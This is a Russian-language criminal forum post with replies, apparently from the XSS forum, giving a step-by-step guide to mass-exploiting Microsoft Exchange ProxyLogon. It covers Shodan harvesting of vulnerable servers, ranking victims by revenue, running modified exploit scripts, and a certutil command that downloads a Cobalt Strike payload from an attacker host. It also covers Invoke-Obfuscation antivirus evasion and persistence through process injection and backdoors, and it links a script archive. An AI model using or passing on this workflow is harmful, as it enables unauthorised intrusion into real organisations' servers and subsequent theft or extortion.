• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья ProxyLogon & CVE-2021-26855

C0rtex

Премиум
Premium
Регистрация
06.01.2021
Сообщения
568
Реакции
276
Гарант сделки
9
Депозит
0.0019
Всем доброго времени суток, нашлось свободное время для написания статьи, строго не судить)). конкретно: что такое ProxyLogon, какой вид уязвимости, а так же как происходило проникновение в сеть, строго не судить, у меня были свои методы проникновения, ------> Поехали!!!


Что такое ProxyLogon?​


ProxyLogon - это формально общее название CVE-2021-26855 , уязвимости на сервере Microsoft Exchange Server, которая позволяет злоумышленнику обойти аутентификацию и выдать себя за администратора. Мы также связали эту ошибку с другой уязвимостью произвольного файла CVE-2021-27065 после авторизации связанной с записью , , чтобы получить выполнение кода. Все затронутые компоненты по умолчанию уязвимы !


В результате , не прошедший проверку подлинности, злоумышленник может выполнять произвольные команды на сервере Microsoft Exchange Server через только открытый порт 443 !


Что нам потребуется?

1) Это сам ProxyLogon, по мне самая хорошая реализация данного CVE от автора Udyz https://github.com/Udyz "Ниже будет выложен доработтаный скрипт"
2) Cobalt Strike
3) Invoke-Obfuscation для Powershell
4) IEX & CERTUTIL.EXE


Оговорюсь сразу работы будет много, данная статья расписана для трудолюбивых так сказать!!!

Атака будет происходить из 3 частей

1) Сбор Материала, Разведка

2) Проникновение в сеть

3) Крепление в сети

Начнем со сбора Материала, мною был выложен "Мануал по Шодан" вот он нам и поможет собрать сразу быстро и много материала, для тестов и проникновения в сеть.
Ссылка на мой пост Мануал по Использованию Shodan.

Приведу сюда пример с моего поста.

Вставляем выложенный мною ключ, пишем ---->> shodan download exchange.json.gz vuln:cve-2021-26855 выдаст плюс минус 10к уязвимых айпи адрессов..
Все на данный момент я вам подсказал где искать сразу и много мата плюс в том что, сразу уязвимый..

После как shodan выкачает все пишем команду ---- >>>> gzip -d exchange.json.gz
После парсим Айпи адреса из файла json ---- >>>> shodan parse exchange.json.gz --fields=ip_str > vuln.txt

На этом сбор материала завершен далее идет разведка материала что он из себя представляет, какое айпи куда относится и т.п

Берем парсер, данный парсер я выложу ниже вместе с другими скриптами.

переименовываем exchange.txt в iplist.txt ждем, данный сканнер покажет какое айпи относится к какому домену есть один подвох некоторые айпи адреса прячутся за провайдерами.

После как парсер спарсит айпи адреса сохранится файлик output.txt где на против каждых айпи будут домены тут уже по пробиву можно взять софт выложенный Борисом, дело каждого.

Хорошо на этом заканчивается разведка Материала какой айпи к чему относится а так же Ревеню.

Шаг второй, сканирования уязвимых айпи на SSRF.
из скрипта было вырезано Авторизация по списку login, и оставленные мною всего 2 логина это administrator & admin, с spn 500, почему я вырезал все остальное и оставил только 2 айпишки, да потому что логины кроме этих двух, не могут авторизоватся и сканирование на пусть будет 20-30 100 штук, это лишняя трата времени.

запускаем скрипт proxy.py -->> идем пить чай, кофе, пиво..

спустя время 10к айпи прочеканы и лежат в output.txt можем сделать так, после как proxy.py закончил свою работу, закидываем айпишки в pars.py и ждем результат какие домены выдал, попадаются разные ревнью, от 300к до 5ккк.

Берем скрипт уже Автора AutoProxyLogon.py оставляем в текстовике только 2 логина administrator & admin, меняем в скрипте автора с cmd /c на powershell /c и строкой ниже так же..

и Вуаля имеем доступ к Машинке и уже с открытым powershell -- пробуем первый вариант, у меня на тот момент 3 vps, на первом Cobalt Strike на 2 teamserver, на 3 не скажу секрет!

Есть 2 варианта генерации а так же доставки, первое поднятие нагрузки в Cobalt, второе генерация payload exe с загрузкой на тот же AnonFiles, и доставка на машинку, CERTUTIL.EXE, иногда бывает в#ебывается на подленность сертификата сайта, 2/3 вариант создания Payload Generator Script(S) web доставка то есть. --->>> Разобрались как будем делать доставку.

Все сгенерировали payload подняли на серваке черезе web доставку, идем в терминал жертвы а то есть в свой, пишем certutil.exe -urlcache -split -f http://{ip}{или domain}/shell.exe shell.exe, я все делал через ngrok что бы понять была ли доставка на компьютер жертвы или нет, 200 ok.

Запуск exeшника производится коммандой -->> start payload.exe может создать батник echo, кому как удобно.

Вуаля мы на машинке жертвы, у нас сессия в кобе)))) 40% сделано, 60% это разведка AD -- поднятие прав -- но это уже совсем другая история, и если я ее тут начну описывать то это займет статей 20 усталых рук!

первый метод payload generator, второй метод Script By Web Delivery --> Powershell IEX, просто вставляем ссылку в терминал и все сессия в кобе, делаем пару прыжков на разные процессы, и закрепление на этом заканчивается, можете еще добавить в автозагрузку backdoor и т.д! дело каждого!


Посмотреть вложение 23816

Забыли про Invoke-Obfuscation, бывают такие моменты что ав блокает запуск вашего exe и удаляет сразу, качает Invoke-Obfuscation с github
Посмотреть вложение 23817

Генерируем в кобе полезную нагрузку powershell ---> заходим в папку Invoke-Obfuscation --> ps.exe > Import-Module .\Invoke-Obfuscation.psd1 --->> Invoke-Obfuscation далее комманды для обфускации

Посмотреть вложение 23821

Посмотреть вложение 23820


set ScriptPath dir{payload.ps1} -> задаем путь до полезной нагрузки
sting - token ---> метод обфускации
all - все
1
clip - копировать
открываем тот же payload.ps1 вычищаем все ctrl - A + ctrl + V save

кидаем для проверки на антискан, из миллион детектов 1 - 2 детект, а в некоторых моментах фуд такой метод нам вполне хватит для получения сессии в Cobalt.. так же инжектив в пару процессов крепимся!!!



Посмотреть вложение 23817Посмотреть вложение 23816









https://anonfiles.com/p2x0s522u5/ProxyLogon_zip || xss.pro || ссылка на архив со скриптом от автора и, доработанным.

Прошу прощения за ошибки! Дальше Интереснее))


Всем спасибо за внимание, Пишите в данной статье в случае если что-то не будет получатся, помогу объясню расскажу!
 
Последнее редактирование:
Статья была интересная!

Щас будут набеги (НЕ ЛЕЗЬ ТУДА. ОНО ТЕБЯ СОЖРЕТ!) на эти сервера (как из статьи про BlueKeep) и похерят кучу компаний (фу таким быть), но помните что нужно быть аккуратными, а лучше вообще использовать эту информацию только в ознакомительных целях и эксплуатировать только на своих машинах.

60% это разведка AD -- поднятие прав -- но это уже совсем другая история, и если я ее тут начну описывать то это займет статей 20 усталых рук!
Может быть есть статьи которые ты можешь посоветовать, инструменты, книги, видео?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ProxyLogon - это формально общее название CVE-2021-26855
Это персональное имя уязвимости\эксплойта. С не давних пор, уникальным и критическим уязвимостям стали давать персональные имена.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Шикарная статья, спасибо!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
поддерживаю, какую то бы дорожную карту по разведке AD
Тут есть шпаргалка по AD, во вложениях
 
как по мне чтобы понять лучше как AD работает, то лучше создат свой на виртуалке конечно.
соединить 3-4 компа и ДК, ну и на этом набивать опыт.

есть много чего вы не сможете найти в интернете потому что находками не кто делиться не любить.
 
поддерживаю, какую то бы дорожную карту по разведке AD
Можно просто прибегнуть к простому поиску по заголовку "Active Directory", можно найти достаточно хорошие материалы для изучения, причем некоторые с грамотным переводом.
 
Можно просто прибегнуть к простому поиску по заголовку "Active Directory", можно найти достаточно хорошие материалы для изучения, причем некоторые с грамотным переводом.

вот, ключевое слово "некоторые" )
материала океан, пока найдешь что-то стоящее пройдет куча времени, которое можно было бы потратить на практику.
недавно смотрел по кобальту руководство на руcском , так там женщина как будто на похоронах читает текст + асинхронизация, после такого задумываешься, а правильно ли они вообще переведены , такие ролики. понятно люди проделали работу, потратили время на перевод, но раз делаете делайте качественно.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Поверь мне, по сравнению с другим - это супер перевод, по крайней мере там все норм переведено и донесено.
 
вот, ключевое слово "некоторые" )
материала океан, пока найдешь что-то стоящее пройдет куча времени, которое можно было бы потратить на практику.
недавно смотрел по кобальту руководство на руcском , так там женщина как будто на похоронах читает текст + асинхронизация, после такого задумываешься, а правильно ли они вообще переведены , такие ролики. понятно люди проделали работу, потратили время на перевод, но раз делаете делайте качественно.
Лично я, ничего противоречащего тут не вижу, ты можешь как изучать материал - так на практике его сразу и пробовать.
В сети есть относительный перевод по Кобальту 4.0 - мануал, на русском, хоть и кривой.
Создаешь виртуалки, делаешь AD - и тестируешь все что успел вычитать.
Хоть большинство статей на этом форуме, не подразумевает в своем повествовании использование CB - ты в любом случаи поймешь как работает та или иная атака, и то, даже под эти виды атак - уже есть скрипты под CB.
 
Здесь принцип "Даренному коню, в зубы не смотрят", то что есть - читаешь, если не устраивает, это твой выбор.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх